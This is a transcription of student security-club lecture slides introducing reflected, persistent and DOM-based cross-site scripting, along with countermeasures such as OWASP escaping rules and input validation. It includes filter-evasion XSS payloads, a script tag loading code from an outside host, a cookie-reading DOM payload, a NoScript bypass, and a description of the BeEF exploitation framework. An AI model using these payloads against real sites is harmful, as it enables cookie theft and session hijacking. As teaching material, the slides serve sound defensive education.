Introduction to XSS attacks!

Transcription

1 Grenoble INP Ensimag _ (in)security we trust _!!! SecurIMAG Introduction to XSS attacks! Lecturer: MOUGEY Camille WARNING: SecurIMAG is a security club at Ensimag. Thoughts, ideas and opinions are not related to Ensimag. The authors assume no liability including for errors and omissions

2 Summary Reflected & Persistent XSS Principle Counter-measure Tools Related DOM based XSS/DOMXSS Principle Counter-measure DOMBased vs. Standard XSS

3 Intro Cross Site Scripting (XSS) Malicious scripts injection XSS!= CSRF Often under estimated Easy to find, hard to defeat XSS on bank website, Facebook, Google, Constant evolution Need standard functions (PHP 5: filter_var())

4 Reflected & Persistent XSS Reflected & Persistent XSS Principle Counter-measure Tools Related DOM based XSS/DOMXSS Principle Counter-measure DOMBased vs. Standard XSS

5 Reflected & Persistent XSS Explanation Reflected

6 Reflected & Persistent XSS Explanation Reflected Persistent Demo

7 Reflected & Persistent XSS Counter-Measure Seems, but easy to defeat In real life: if(preg_match("#<script#is", urldecode($input)) die("fail"); - > Safe? Try < script (with a space) <IMG SRC="jav ascript:alert('xss');"> Browser support: [IE7.0 IE6.0 NS8.1- IE] [NS8.1- G FF2.0] [O9.02] <IMG SRC="jav ascript:alert('xss');"> Browser support: [IE7.0 IE6.0 NS8.1- IE] [NS8.1- G FF2.0] [O9.02] <SCRIPT SRC= Browser support: [IE7.0 IE6.0 NS8.1- IE] [NS8.1- G FF2.0] [O9.02] <SCRIPT SRC=//ha.ckers.org/.j> Browser support: [IE7.0 IE6.0 NS8.1- IE] [NS8.1- G FF2.0] [O9.02]

8 Reflected & Persistent XSS Counter-Measure Testing for XSS (blackbox): Identify Input Analyse HTML Code Testing for Stored XSS Replay browser trames/request (from logs, ) with an instumented browser

9 Reflected & Persistent XSS Counter-Measure Client Side SOP NoScript Bypass method v NoScript's default an0- xss rules: ^[url]h[p://[/url]([a- z]+)\.google\.(?:[a- z]{1,3}\.)?[a- z]+/(?:search custom \1)\? v Hold CTRL, and NoScript desapeared.. Try

10 Reflected & Persistent XSS Counter-Measure Server side OWASP 8 Rules RULE #1 & - - > & < - - > < > - - > > " - - > " RULE #1 - HTML Escape Before Inserting Untrusted Data into HTML Element Content In general, never trust client Input! Have you thought about User-Agent, Referer, Accept-Language, Cookies,? HTTPOnly cookie flag

11 Reflected & Persistent XSS Tools related Counter-Measure Input/Output sanitization: HTMLPurifier Stored XSS Finder Scrubbr Some homemade script Ajax worms XSS Exploitation Framework BeEF

12 BeEF Architecture

13 BeEF Launch Hook And you get:

14 BeEF BeEF Notable feature Browser exploitation modules Keystroke logging Browser proxying Integration with Metasploit via XML-RPC Plugin detection Intranet service exploitation Tor detection Browser functionality detection modules Demo!

15 DOM based XSS/DOMXSS Reflected & Persistent XSS Principle Counter-measure Tools Related DOM based XSS/DOMXSS Principle Counter-measure DOMBased vs. Standard XSS

16 DOM Based XSS/DOMXSS/type-0 XSS DOM (Document Object Model)? <P> Content Align <P ALIGN="right">This is a <B>paragraph</B></P> <B> This is a paragraph right

17 DOM Based XSS/DOMXSS/type-0 XSS DOM Based XSS principle Main idea The web-server does not receive the payload anymore! Detection are usually focus on the server output 2 4 SecurIMAG - Introduc0on to XSS atacks - MOUGEY Camille

18 DOMBased Example Classic example: <HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.url.indexof("name=")+5; document.write(document.url.substring(pos,document.url.length)); </SCRIPT> <BR> Welcome to our system </HTML> Normal use: What about : name=<script>alert(document.cookie)</script> The server see the payload? Use # foobar=name=<script>alert(document.cookie)<script>&name=fabien

19 DOMBased Counter-Measure Traditional methods HTML encoding output data at the server side Removing/encoding offending input data at the server side Don t work well on DOMBased! 3 main rules Avoid client side document sensitive actions, using client side data. Prefer Dynamic pages! Analyzing and hardening the client side (Javascript) code Use a very strict IPS policy (avoid evasion technique like double attribut)

20 DOMBased Counter-Measure Back to the Example <SCRIPT> var pos=document.url.indexof("name=")+5; var name=document.url.substring(pos,document.url.length); if (name.match(/^[a-za-z0-9]$/)) { document.write(name); } else { window.alert("security error"); } </SCRIPT>

21 DOMBased vs. Standard XSS Reflected & Persistent XSS Principle Counter-measure Tools Related DOM based XSS/DOMXSS Principle Counter-measure DOMBased vs. Standard XSS

22 DOMBased vs. Standard XSS Root cause Standard XSS Insecure embedding of client input in HTML outbound page DOM Based XSS Insecure reference and use (in a client side code) of DOM objects that are not fully controlled by the server provided page Page nature Dynamic ONLY Typically sta0c(html) Vulnerability DetecPon Manual Fault injec0on Automa0c Fault Injec0on Code Review (need access to the page source) Manual Fault Injec0on Code Review (can be done remotely!) AQack DetecPon Web server logs Online a[ack detec0on tools (IDS, IPS, web applica0on firewalls) If evasion techniques are applicable and used - no server side detec0on is possible Counter- Measure Data valida0on at the server side A[ack preven0on u0li0es/tools (IPS, applica0on firewalls) Data valida0on at the client side (in Javascript) Alterna0ve server side logic

23 Questions?

24 Source / Bibliography Wikipedia: XSS DOM Berckeley s University: An Empirical Analysis of XSS Sanitization in Web Application Frameworks MISC n 49 XSS Cheat Sheet : DOMXSS Wiki: DOM Based Cross Site Scripting or XSS of the Third Kind

25 Source / Bibliography OWASP: XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001) Testing_for_Stored_Cross_site_scripting_(OWASP-DV-002) Testing_for_DOM-based_Cross_site_scripting_(OWASP-DV-003) Scrubbr BeEF: Ajax Worms: Mario Heiderich (HIP2k11):